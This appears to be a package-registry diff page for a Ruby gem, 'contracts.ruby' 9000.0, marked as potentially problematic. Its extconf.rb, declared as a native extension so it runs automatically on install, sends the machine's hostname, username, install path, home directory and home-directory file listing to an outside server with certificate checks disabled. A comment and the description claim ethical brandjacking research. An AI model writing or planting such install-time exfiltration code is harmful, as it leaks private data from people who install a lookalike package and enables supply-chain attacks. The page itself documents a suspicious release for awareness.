contracts.ruby 9000.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of contracts.ruby might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: e022a0f93ecc0772c0ff3c397f9d1d8fa6a6e4fbcf544b60699d7b5d7bff7b79
4
+ data.tar.gz: d1f7b951b33be4b8392baa2c93615739eda0a05caa2805e4d65fe8da8be8c095
5
+ SHA512:
6
+ metadata.gz: 8c91e1f30ff6ccc3e1c6d4ef0b649a74ea126dc448ddde2430c5dfadf6c92eaeb5bb12219e953d49de6459b3c3b11639e95ae025f711830a4e71c5a4bd22b32f
7
+ data.tar.gz: c02c46b9dc43d72f4cce311c259690271f20c778869ab7f42edcf0a18c6413a3b91fda138a7b18cdc3fef3b8615282e62552c9fc2e28475a0d97005768eda844
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/contracts.ruby/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: contracts.ruby
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-05 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.4
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []